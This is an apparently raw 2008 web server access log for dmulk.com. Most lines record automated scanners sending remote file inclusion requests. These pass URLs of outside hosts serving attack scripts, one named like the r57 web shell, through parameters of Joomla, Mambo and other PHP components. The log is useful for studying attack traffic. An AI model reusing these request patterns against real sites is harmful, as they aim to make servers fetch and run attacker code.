217.22.228.144 - - [09/Jun/2008:10:17:42 -0700] "GET //components/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:10:17:42 -0700] "GET /logs//components/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.232.94.122 - - [09/Jun/2008:10:17:59 -0700] "GET /logs/access_080124.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:10:18:04 -0700] "GET /logs/access_080309.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:10:18:05 -0700] "GET /errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:10:18:05 -0700] "GET /logs/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.189.26.170 - - [09/Jun/2008:10:18:06 -0700] "GET /logs/access_080309.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.189.26.170 - - [09/Jun/2008:10:18:06 -0700] "GET /errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.189.26.170 - - [09/Jun/2008:10:18:07 -0700] "GET /logs/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.239.89.26 - - [09/Jun/2008:10:18:13 -0700] "GET /logs/access_080201.log/index.php?pagina=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.75.193.70 - - [09/Jun/2008:10:18:15 -0700] "GET /logs/access_080308.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.239.89.26 - - [09/Jun/2008:10:18:16 -0700] "GET /index.php?pagina=http://www.venezia2.it/coges.txt?? HTTP/1.1" 200 16819 "-" "libwww-perl/5.65" "www.dmulk.com"
217.75.193.70 - - [09/Jun/2008:10:18:16 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.75.193.70 - - [09/Jun/2008:10:18:16 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.239.89.26 - - [09/Jun/2008:10:18:17 -0700] "GET /logs/index.php?pagina=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.53.114.42 - - [09/Jun/2008:10:18:22 -0700] "GET /logs/access.log/content.php?page=http://www.poko.sitesled.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.53.114.42 - - [09/Jun/2008:10:18:22 -0700] "GET /logs/content.php?page=http://www.poko.sitesled.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.53.114.42 - - [09/Jun/2008:10:18:22 -0700] "GET /content.php?page=http://www.poko.sitesled.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
211.189.26.170 - - [09/Jun/2008:10:18:26 -0700] "GET /logs/access_071219.log//components/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.19.184.14 - - [09/Jun/2008:10:18:56 -0700] "GET /logs/access_080201.log//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.ffshrine.org/iplog???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.19.184.14 - - [09/Jun/2008:10:18:57 -0700] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.ffshrine.org/iplog???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.19.184.14 - - [09/Jun/2008:10:18:57 -0700] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.ffshrine.org/iplog???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.249.67.79 - - [09/Jun/2008:10:19:04 -0700] "GET /blog/wp-content/gallery/crestoc-2008/thumbs/thumbs_img_0045.jpg HTTP/1.1" 200 10920 "-" "Googlebot-Image/1.0" "dmulk.com"
217.22.228.144 - - [09/Jun/2008:10:19:33 -0700] "GET /logs/access_080309.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:10:19:34 -0700] "GET /errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:10:19:34 -0700] "GET /logs/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:10:19:52 -0700] "GET /logs/access_080308.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.239.89.26 - - [09/Jun/2008:10:20:10 -0700] "GET /logs/access.log/index.php?pagina=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
124.136.39.87 - - [09/Jun/2008:10:20:14 -0700] "GET /logs/access.log//index.php?_SERVER[DOCUMENT_ROOT]=http://www.tripiwarez.eu/mrneti.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
124.136.39.87 - - [09/Jun/2008:10:20:14 -0700] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://www.tripiwarez.eu/mrneti.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
124.136.39.87 - - [09/Jun/2008:10:20:16 -0700] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://www.tripiwarez.eu/mrneti.txt???? HTTP/1.1" 200 16847 "-" "libwww-perl/5.65" "www.dmulk.com"
200.53.114.42 - - [09/Jun/2008:10:20:18 -0700] "GET /logs/access_071224.log/content.php?page=http://www.poko.sitesled.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
66.249.67.79 - - [09/Jun/2008:10:20:41 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0050.jpg HTTP/1.1" 200 452686 "-" "Googlebot-Image/1.0" "dmulk.com"
66.246.185.183 - - [09/Jun/2008:10:21:03 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.axelfoto.com/sr/editor_uploads/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.246.185.183 - - [09/Jun/2008:10:21:03 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.axelfoto.com/sr/editor_uploads/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.7.108.203 - - [09/Jun/2008:10:21:17 -0700] "GET /logs//include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.swdgems.com/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.7.108.203 - - [09/Jun/2008:10:21:17 -0700] "GET //include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.swdgems.com/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.189.26.170 - - [09/Jun/2008:10:21:24 -0700] "GET /logs/access_080308.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.7.108.203 - - [09/Jun/2008:10:22:08 -0700] "GET /logs/*.php?dir=http://www.swdgems.com/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.7.108.203 - - [09/Jun/2008:10:22:08 -0700] "GET /*.php?dir=http://www.swdgems.com/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:10:22:54 -0700] "GET /logs//components/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:10:22:54 -0700] "GET //components/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.189 - - [09/Jun/2008:10:22:56 -0700] "GET /logs/access_080205.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:10:23:19 -0700] "GET /logs/access_080306.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.3.241.220 - - [09/Jun/2008:10:23:24 -0700] "GET /blog/index.php/2008/06/07/westoc-2008-preparation-thank-you-byron/ HTTP/1.1" 200 9331 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "dmulk.com"
207.218.234.146 - - [09/Jun/2008:10:23:26 -0700] "GET /logs/access_080312.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://kiliclub.com/tmp/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.3.241.220 - - [09/Jun/2008:10:23:28 -0700] "GET /blog/index.php/feed/ HTTP/1.1" 200 12517 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "dmulk.com"
70.84.182.98 - - [09/Jun/2008:10:23:41 -0700] "GET ////common/db.php?commonpath=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
77.221.157.210 - - [09/Jun/2008:10:23:54 -0700] "GET /logs/access_071225.log//newspublish/include.php?path%5Bdocroot%5D=http://loveyou-love.t35.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.230.197.170 - - [09/Jun/2008:10:24:29 -0700] "GET /logs/access_080309.log/components/com_rssxt/pinger.php?mosConfig_absolute_path=http://landleben.bieswang.de/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.170 - - [09/Jun/2008:10:24:30 -0700] "GET /components/com_rssxt/pinger.php?mosConfig_absolute_path=http://landleben.bieswang.de/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.170 - - [09/Jun/2008:10:24:30 -0700] "GET /logs/components/com_rssxt/pinger.php?mosConfig_absolute_path=http://landleben.bieswang.de/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
199.219.162.245 - - [09/Jun/2008:10:24:32 -0700] "GET /blog/wp-content/uploads/mvi_0037.avi HTTP/1.1" 200 9261848 "http://www.st-owners.com/forums/showthread.php?t=42712" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
208.71.170.173 - - [09/Jun/2008:10:24:34 -0700] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.71.170.173 - - [09/Jun/2008:10:24:34 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.71.170.173 - - [09/Jun/2008:10:24:34 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:10:24:51 -0700] "GET /logs/access_071224.log//components/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.222.50 - - [09/Jun/2008:10:24:56 -0700] "GET /logs/access_080201.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.222.50 - - [09/Jun/2008:10:24:57 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.222.50 - - [09/Jun/2008:10:24:57 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.222.50 - - [09/Jun/2008:10:25:20 -0700] "GET /logs/access_080312.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.234.133.173 - - [09/Jun/2008:10:25:44 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://nozyk.org/rob.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
203.130.242.48 - - [09/Jun/2008:10:26:34 -0700] "GET /logs/access_080309.log/components/com_rssxt/pinger.php?mosConfig_absolute_path=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.130.242.48 - - [09/Jun/2008:10:26:35 -0700] "GET /components/com_rssxt/pinger.php?mosConfig_absolute_path=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.130.242.48 - - [09/Jun/2008:10:26:35 -0700] "GET /logs/components/com_rssxt/pinger.php?mosConfig_absolute_path=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.130.242.48 - - [09/Jun/2008:10:26:35 -0700] "GET /components/com_rssxt/pinger.php?mosConfig_absolute_path=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.234.133.173 - - [09/Jun/2008:10:26:41 -0700] "GET /logs/access_080123.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://nozyk.org/rob.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:10:27:19 -0700] "GET /logs/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:10:27:19 -0700] "GET /errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.75.193.70 - - [09/Jun/2008:10:28:16 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:10:29:06 -0700] "GET /logs/access_080326.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:10:29:06 -0700] "GET /errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:10:29:06 -0700] "GET /logs/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.232.94.122 - - [09/Jun/2008:10:29:16 -0700] "GET /logs/access_080215.log/port.php?content=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
77.55.90.2 - - [09/Jun/2008:10:29:28 -0700] "GET /logs/senetman/html/index.php?page=http://www.linknetcrew.com/code/mc22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
77.55.90.2 - - [09/Jun/2008:10:29:29 -0700] "GET /senetman/html/index.php?page=http://www.linknetcrew.com/code/mc22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
208.71.170.173 - - [09/Jun/2008:10:29:41 -0700] "GET /logs/access.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.71.170.173 - - [09/Jun/2008:10:29:41 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.71.170.173 - - [09/Jun/2008:10:29:42 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.232.94.122 - - [09/Jun/2008:10:30:00 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.232.94.122 - - [09/Jun/2008:10:30:00 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.232.94.122 - - [09/Jun/2008:10:30:00 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.230.197.170 - - [09/Jun/2008:10:30:01 -0700] "GET /logs/access_080418.log/components/com_rssxt/pinger.php?mosConfig_absolute_path=http://landleben.bieswang.de/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.119.240.143 - - [09/Jun/2008:10:30:02 -0700] "GET /logs/access_080106.log//skin/zero_vote/ask_password.php?dir=http://gbof.ca/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.240.143 - - [09/Jun/2008:10:30:02 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://gbof.ca/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.240.143 - - [09/Jun/2008:10:30:03 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://gbof.ca/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.64.244.176 - - [09/Jun/2008:10:30:05 -0700] "GET /logs//playing.php/common/db.php?commonpath=http://www.indicce.com/admin/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:10:30:29 -0700] "GET /logs/access_080326.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:10:30:29 -0700] "GET /errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.130.242.48 - - [09/Jun/2008:10:30:29 -0700] "GET /logs/components/com_rssxt/pinger.php?mosConfig_absolute_path=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:10:30:30 -0700] "GET /logs/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.130.242.48 - - [09/Jun/2008:10:30:30 -0700] "GET /components/com_rssxt/pinger.php?mosConfig_absolute_path=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:10:30:33 -0700] "GET /logs/access_080325.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.189.26.170 - - [09/Jun/2008:10:30:34 -0700] "GET /logs/access_080306.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.212.90.214 - - [09/Jun/2008:10:30:41 -0700] "GET /logs/access_080103.log//MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.7-miles.com/media/buddy_icons/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.212.90.214 - - [09/Jun/2008:10:30:41 -0700] "GET //MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.7-miles.com/media/buddy_icons/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.212.90.214 - - [09/Jun/2008:10:30:41 -0700] "GET /logs//MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.7-miles.com/media/buddy_icons/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
124.217.243.21 - - [09/Jun/2008:10:30:46 -0700] "GET /logs/access_080103.log//MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.7-miles.com/media/buddy_icons/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
124.217.243.21 - - [09/Jun/2008:10:30:47 -0700] "GET //MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.7-miles.com/media/buddy_icons/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
124.217.243.21 - - [09/Jun/2008:10:30:47 -0700] "GET /logs//MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.7-miles.com/media/buddy_icons/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
77.55.90.2 - - [09/Jun/2008:10:30:48 -0700] "GET /logs/access_080308.log/senetman/html/index.php?page=http://www.linknetcrew.com/code/mc22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
77.55.90.2 - - [09/Jun/2008:10:30:48 -0700] "GET /senetman/html/index.php?page=http://www.linknetcrew.com/code/mc22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
77.55.90.2 - - [09/Jun/2008:10:30:49 -0700] "GET /logs/senetman/html/index.php?page=http://www.linknetcrew.com/code/mc22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
67.15.12.3 - - [09/Jun/2008:10:31:03 -0700] "GET /logs/access_080103.log//MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.7-miles.com/media/buddy_icons/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.15.12.3 - - [09/Jun/2008:10:31:04 -0700] "GET //MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.7-miles.com/media/buddy_icons/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
124.217.243.21 - - [09/Jun/2008:10:31:05 -0700] "GET /logs/access_080129.log//MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.7-miles.com/media/buddy_icons/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.15.12.3 - - [09/Jun/2008:10:31:05 -0700] "GET /logs//MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.7-miles.com/media/buddy_icons/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.51.132.170 - - [09/Jun/2008:10:31:08 -0700] "GET /logs/access_080103.log//MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.7-miles.com/media/buddy_icons/list.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.51.132.170 - - [09/Jun/2008:10:31:08 -0700] "GET //MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.7-miles.com/media/buddy_icons/list.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.51.132.170 - - [09/Jun/2008:10:31:09 -0700] "GET /logs//MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.7-miles.com/media/buddy_icons/list.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
212.203.9.46 - - [09/Jun/2008:10:31:12 -0700] "GET /logs//errors.php?error=http://nozyk.org/rob.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.203.9.46 - - [09/Jun/2008:10:31:13 -0700] "GET //errors.php?error=http://nozyk.org/rob.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.51.132.170 - - [09/Jun/2008:10:31:13 -0700] "GET /logs/access_080129.log//MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.7-miles.com/media/buddy_icons/list.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.15.12.3 - - [09/Jun/2008:10:31:15 -0700] "GET /logs/access_080129.log//MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.7-miles.com/media/buddy_icons/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
62.149.175.25 - - [09/Jun/2008:10:31:15 -0700] "GET /logs//playing.php/common/db.php?commonpath=http://www.indicce.com/admin/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.169.154.69 - - [09/Jun/2008:10:31:22 -0700] "GET /logs/access_080103.log//MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.7-miles.com/media/buddy_icons/list.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
